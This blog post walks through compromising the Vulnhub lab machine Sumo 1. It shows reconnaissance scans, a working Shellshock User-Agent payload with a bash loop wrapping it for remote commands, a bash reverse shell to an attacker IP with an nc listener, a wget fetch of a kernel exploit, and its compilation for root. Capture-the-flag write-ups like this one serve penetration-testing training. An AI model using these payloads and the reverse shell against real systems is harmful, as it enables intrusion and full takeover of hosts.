---
title: "Walkthrough Vulnhub: Sumo1"
date: 2020-06-12T10:59:41+02:00
draft: false
toc: false
images:
tags:
  - vulnhub
  - walkthrough
  - pentest
  - beginner
---

Today I'm going to present you my writeup for Sumo 1. It's a linux machine with a beginner level difficulty. You can find the link to download it [here](https://www.vulnhub.com/entry/sumo-1,480/).

Let's go! So we start with a **netdiscover** to find the victim's IP address.

{{< image src="../../posts-img/vulnhub-sumo1/netdiscover.png" alt="Netdisover" position="left" style="border-radius: 2px; margin: 20px;" >}}

We continue with an nmap scan to discover which services/ports are active on the machine.

```sh
$ nmap -A -T4 192.168.43.11
```

{{< image src="../../posts-img/vulnhub-sumo1/nmap.png" alt="Nmap scan" position="left" style="border-radius: 2px; margin: 20px;" >}}

There is only port 22 with OpenSSH 5.9p1 and port 80 with Apache 2.2.22 open. The versions are not very up to date. :grinning: We can also see that the machine seems to be on Ubuntu.

So, I decide to look at the web server first. And here's the first page :

{{< image src="../../posts-img/vulnhub-sumo1/index.html.png" alt="Index page" position="left" style="border-radius: 2px; margin: 20px;" >}}

There is only one static index.html page which is not very interesting. So I run a vulnerability scan with nikto and a scan of the site tree with gobuster.

The scan of the tree structure of the site does not show anything interesting but nikto shows us a possible entry point. :smiley:

{{< image src="../../posts-img/vulnhub-sumo1/nikto.png" alt="Nikto scan" position="left" style="border-radius: 2px; margin: 20px;" >}}

We come across a vulnerability widely known as "ShellShock".

Let's check if this vulnerability is exploitable.

```sh
$ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" http://192.168.43.111/cgi-bin/test.sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

And yes! We've got a RCE (Remote code execution). Here's a little summary of what just happened.

The User-Agent variable is stored by the web server in a variable to better understand the client's browser. The web server uses bash tools that will use and interpret this variable because it starts with **() { :; };**.

You can learn more about ShellShock here:
* https://blog.cloudflare.com/inside-shellshock/
* https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29
* https://github.com/opsxcq/exploit-CVE-2014-6271

So I immediately created a shell script to save time.

```bash
#!/bin/bash

while true
do
	read -p "> " COMMAND
	curl -H "User-Agent: () { :; }; echo; /bin/bash -c '$COMMAND'" http://192.168.43.111/cgi-bin/test.sh
done
```

Let's start internal reconnaissance.

{{< image src="../../posts-img/vulnhub-sumo1/recon.png" alt="Internal reconnaissance" position="left" style="border-radius: 2px; margin: 20px;" >}}

So we're the **www-data** user (what a surprise! :laughing:) and there's another user under the name **sumo** who doesn't look very interesting at first glance.

To elevate our privileges we will use a kernel exploit.

```
> uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
> lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 12.04 LTS
Release:	12.04
Codename:	precise
```

After a quick search with **searchsploit** we come across the following exploit: [Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)](https://www.exploit-db.com/exploits/33589)

Before launching it, I decide to use a reverse shell in bash for more comfort.

```
> bash -i >& /dev/tcp/192.168.43.75/1337 0>&1

-- NEW TAB --
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.43.75] from (UNKNOWN) [192.168.43.111] 38388
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
```

So I use the python HTTP server to be able to download the exploit source code on the victim machine.

```
www-data@ubuntu:/tmp$ wget 192.168.43.75:8000/33589.c -O exploit.c
...
www-data@ubuntu:/tmp$ gcc exploit.c -O2
gcc exploit.c -O2
gcc: error trying to exec 'cc1': execvp: No such file or directory
```

{{< image src="../../gif/sad.gif" alt="GIF Sad" position="left" style="border-radius: 2px; margin: 20px; max-height: 300px;" >}}

Unfortunately, the exploit does not want to be compiled. :sob: We can remedy this problem by modifying the PATH variable.

```
www-data@ubuntu:/tmp$ PATH=/usr/bin:$PATH       
PATH=/usr/bin:$PATH
www-data@ubuntu:/tmp$ export PATH
export PATH
www-data@ubuntu:/tmp$ gcc exploit.c -O2
gcc exploit.c -O2
www-data@ubuntu:/tmp$ ls
ls
a.out
exploit.c
```

The exploit is well compiled, let's go!

```
www-data@ubuntu:/tmp$ ./a.out 0
./a.out 0
stdin: is not a tty
id
uid=0(root) gid=0(root) groups=0(root)    <-- root :)
ls /root
root.txt
cat /root/root.txt
{Sum0-SunCSR-2020_r001}
```

{{< image src="../../gif/oura.gif" alt="GIF Victory" position="left" style="border-radius: 2px; margin: 20px; max-height: 300px;" >}}

There you go, I hope this writeup gets you more !
